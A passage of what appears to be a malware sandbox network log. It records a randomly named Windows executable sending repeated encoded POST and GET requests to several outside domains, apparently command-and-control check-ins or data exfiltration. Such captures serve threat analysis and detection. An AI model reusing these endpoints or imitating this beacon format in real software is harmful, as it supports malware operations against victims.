                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:57:23.798679113 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:23 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 1cd8a78e-dc82-4580-a7a1-5d1f60780398
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5IodcmwxVl5JInRJIuIaYm6BKwkQ%2BMteMMg3Xo8XMFAsE%2F7GYSiL0wP3hmdWwY5wEP2yJXX8uetIvit9fYo0EN6%2FbeRkvpURQ2YQ64wPSqMSCTEyxG%2Brjdnnto8vW9pnAHA6R8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1e59d5c43ee-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=561&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 31 79 78 63 2f 22 5d 7d 2c 22 64 65 62 75 67
                                                                                  Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /1yxc/"]},"debug
                                                                                  Dec 9, 2024 06:57:23.798736095 CET | 88 | IN | Data Raw: 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 31 63 64 38 61 37 38 65 2d 64 63 38 32 2d 34 35 38 30 2d 61 37 61 31 2d 35 64 31 66 36 30 37 38 30 33 39 38 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d
                                                                                  Data Ascii: Info":{"correlationId":"1cd8a78e-dc82-4580-a7a1-5d1f60780398","stackTrace":null}}0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.7 | 49845 | 85.25.177.138 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:57:29.762391090 CET | 838 | OUT | POST /7mvy/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 39 55 2b 51 66 5a 4c 65 5a 4d 57 42 4b 72 30 42 62 4d 67 30 48 35 57 4a 4d 75 65 72 5a 45 7a 2f 30 77 69 46 56 33 2f 57 55 65 47 41 6d 54 66 71 77 6a 32 54 76 2b 62 42 78 57 43 54 31 5a 35 38 57 59 6f 47 79 58 48 55 4c 44 33 67 6f 54 41 52 67 79 44 4e 58 75 37 62 63 72 65 7a 52 67 67 59 4e 45 57 43 67 2f 68 77 6c 71 38 56 41 34 62 79 61 47 4d 37 78 7a 58 30 5a 46 43 6a 6a 48 49 6a 50 30 51 4d 2f 35 4e 66 46 77 4d 42 77 57 52 4b 45 74 6c 5a 74 56 75 48 54 77 69 4a 52 2b 44 2f 58 57 44 38 73 6a 6d 6e 36 61 57 31 4d 6e 6f 35 57 2b 44 77 75 4f 7a 57 41 76 56 59 65 47 52 30 5a 45 43 33 79 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=s4z0josg0gQQ9U+QfZLeZMWBKr0BbMg0H5WJMuerZEz/0wiFV3/WUeGAmTfqwj2Tv+bBxWCT1Z58WYoGyXHULD3goTARgyDNXu7bcrezRggYNEWCg/hwlq8VA4byaGM7xzX0ZFCjjHIjP0QM/5NfFwMBwWRKEtlZtVuHTwiJR+D/XWD8sjmn6aW1Mno5W+DwuOzWAvVYeGR0ZEC3yQ==
                                                                                  Dec 9, 2024 06:57:31.028702021 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 09 Dec 2024 05:57:30 GMT
                                                                                  Server: Apache/2
                                                                                  Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 242
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.7 | 49851 | 85.25.177.138 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:57:32.428884983 CET | 858 | OUT | POST /7mvy/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=s4z0josg0gQQn1OQe+feesWGXb0BMcgoH5KJMvKCe2X/zVmFU1XWTeGAszfV9D2Yv+eixX+T1ZF8WdMGu0fXND3mlzAX9CDNXu7bcq/kRgoYN0mCgehzsK8WR4byeGM/xzWjZEP0jCUjPwAM/sxYOwML+2QLUcddn36fVxW6OMPkSgCe2BqLkLuOIlMPBYeFsP3ONNh5Bx0eUWjzko0bb3Ez0E5ipvSlnNxEp8k=
Dec 9, 2024 06:57:33.693114042 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 05:57:33 GMT
Server: Apache/2
Location: https://www.mrpokrovskii.pro/7mvy/
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49861 | 85.25.177.138 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:57:35.097094059 CET | 1871 | OUT | POST /7mvy/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.mrpokrovskii.pro
Referer: http://www.mrpokrovskii.pro/7mvy/
Content-Length: 1252
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=s4z0josg0gQQn1OQe+feesWGXb0BMcgoH5KJMvKCe2f/znuFSUXWSeGAqDfQ9D2Zv6zrxXyt1fJ8W7AGiVfXej3msTAWgyCXXurfcqPkRgoYN2+C3fhzqK8VA4bmaGMXxzOzZEbkj2YjORsMz+ZYDwMNzWRYUdgDn3m5VxSDOM3kTxeFlyiH16qIK1VqO5OjscP4M/9kABwDN1bnnflkCnFAs180u6+g8slM9qNKkonZtTU1XGxIvEvXBGWb6G4463C++jo9ddk9m1WtQE+LDF8UjJ0dRzuD83wMmzeMPi4N47Wynim6f7zX7y5UJ2sltMXm49gW6R//8DEk+jUUvp1N6RzXuMGszkIDR9DVKIsZPQIMTlyW/rfBtaJN501EV77etj6vc+JH+YiIWQb35D3/wZI3ml1EvlHTUyUgv519Mz4xZsZ99eiu19pgX1mN5wnldWzVhZEtEzZo8pYxoel3A03M8untDYv51LOmuVRnyboEYcMzXTPJ7Oj4kMLmTj54H1JvonHnsicFQsQ1RAHLxIBCjI8OudilnMDNZMHuS/WhwEq6/+ZO8n+R4jSZ+WOCQ5nlLD5FFq4JCDLrQ8fFo0Fn7SXj3D8ecIqB8d3hjymr8F/VtZ1AH6ugoT2076f83gvPaLTARJcXSKJdNRHOhn3oBPOtoMVgZUFURigjFyjAerGdu5szDMvqot7WXKw8wqWId63oRwHOj8J6vlxf/AEWzJOkH8I3XkBN3tnH9KSdGci4VR3r1LGxQcauNrytZGttmWMby1rokEfjrymXm5UnuWoOgFTWdoQYs+Q69G1WjYNZiDdvtLz0W/rL7WbNOUhr3oAuMflhjqbNTEzD/do+zNB0hRFnBHsJ5BMg//ShLLyR1UfzTd+gyue1WZSQGOCKN1AlW1PBmONrD7S4nCARbWlNVEZVX0ZOe3GNDH+zdU/wgWfgoXAw1EXRGGDkklQ8Rkb/VEHjCKytXHnABnoKvzJmFtjgVSfXu1K7 [TRUNCATED]
Dec 9, 2024 06:57:36.367711067 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 05:57:36 GMT
Server: Apache/2
Location: https://www.mrpokrovskii.pro/7mvy/
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49868 | 85.25.177.138 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:57:37.748908997 CET | 563 | OUT | GET /7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 9, 2024 06:57:39.032749891 CET | 784 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 09 Dec 2024 05:57:38 GMT
Server: Apache/2
Location: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA
Content-Length: 405
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49923 | 173.236.199.97 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:58:01.984894991 CET | 814 | OUT | POST /zu0o/ HTTP/1.1
Host: www.kvsj.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.kvsj.net
Referer: http://www.kvsj.net/zu0o/
Content-Length: 220
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=W87YeBucGxwNEcAo7aqssv23KIcdhh5dfNs3nYAExNjGOv5TRq7i4rD26d5QjSAaCuj8OIywMTWHYxEAKedZGtQZRF6Z30voUa0RyhzXNJ8zJo+d1tUApqmfkGs6rAvT9uWhy5nEdhMTUerCCrHJPUdsFrgch0uNkalM4fQYbww9G2QWiwZHW0nXEUyV1Sy9fTYLDgOiS3ZyrJhW8Q==
Dec 9, 2024 06:58:03.076719999 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:02 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49929 | 173.236.199.97 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:58:04.655942917 CET | 834 | OUT | POST /zu0o/ HTTP/1.1
Host: www.kvsj.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.kvsj.net
Referer: http://www.kvsj.net/zu0o/
Content-Length: 240
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=W87YeBucGxwNG/oo0Zys9f3FPIcduB5ZfNw3nasux/3GOKFTfITi5rD2it478CAvCuvCOJOwMTyHYw0AKvdaH9QbZl6boEvoUa0RyhWyNKMzJc6d0JADqqntjGs6vAua9uW5y7Crdl8TUd/CD5jOVEdiKLgCg3CFuY5g8JANdyJCOgR04SVrIlfsAWWji0vIdScTOC6DNA8YmbASqoUt6TcBFFBsY3BWULv5ar8=
Dec 9, 2024 06:58:05.808597088 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:05 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49936 | 173.236.199.97 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:58:07.321552038 CET | 1847 | OUT | POST /zu0o/ HTTP/1.1
Host: www.kvsj.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.kvsj.net
Referer: http://www.kvsj.net/zu0o/
Content-Length: 1252
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 9, 2024 06:58:08.416271925 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:08 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49945 | 173.236.199.97 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:58:09.988408089 CET | 555 | OUT | GET /zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byl HTTP/1.1
Host: www.kvsj.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 9, 2024 06:58:11.095673084 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:10 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 13
Source: 192.168.2.7:49962
Destination: 203.161.42.73:80
PID: 5412
Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe

Timestamp: Dec 9, 2024 06:58:17.011692047 CET
Bytes transferred: 829
Direction: OUT
Data:
POST /n8su/ HTTP/1.1
Host: www.learniit.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.learniit.info
Referer: http://www.learniit.info/n8su/
Content-Length: 220
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=oH5aM1jkhdUjZNQnKxDDH14qmIJh+QzwpZ5vo+cUz5bjAluDCPIyuHx0ENYn8xIDceQivSDJf9KOs9vd1E6tAN8PjI3ia5lTnmcGCH4IDqTEr9adysDcQxf5l6OQJiSbZrF3T/3Odd+d73wj1KU3BLLUEqF6isuAuWXKk8BwXeWj1AWPKAhB+6fplGb0sHQ3+ycLsqwbKqiOA1F8hw==
Timestamp: Dec 9, 2024 06:58:18.241955042 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:18 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


Session ID: 14
Source: 192.168.2.7:49968
Destination: 203.161.42.73:80
PID: 5412
Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe

Timestamp: Dec 9, 2024 06:58:19.680959940 CET
Bytes transferred: 849
Direction: OUT
Data:
POST /n8su/ HTTP/1.1
Host: www.learniit.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.learniit.info
Referer: http://www.learniit.info/n8su/
Content-Length: 240
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Data Ascii: PHM8hj-=oH5aM1jkhdUjbtgnRQDDGV4p6YJhkgz0pZFvo74+zL/jAEeDBLkyvHx0PtYo/BJucedRvQXJf9OOs8fd116qAd8Bro3kFplTnmcGCEEuDq7E3cqd09DfZRf6i6OQfiSXZrFZT6fkdeGd72Aj1ZM0PLLWJKEwyMv2pWDLjqRWR9Gy9WXtQittgrnShE/C7hNC8zYThIE6VdHkNnk43NXVKtamrTbZG6962vOYWh4=
Timestamp: Dec 9, 2024 06:58:20.897641897 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 05:58:20 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


Session ID: 15
Source: 192.168.2.7:49974
Destination: 203.161.42.73:80
PID: 5412
Process: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe

Timestamp: Dec 9, 2024 06:58:22.353539944 CET
Bytes transferred: 1862
Direction: OUT
Data:
POST /n8su/ HTTP/1.1
Host: www.learniit.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.learniit.info
Referer: http://www.learniit.info/n8su/
Content-Length: 1252
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
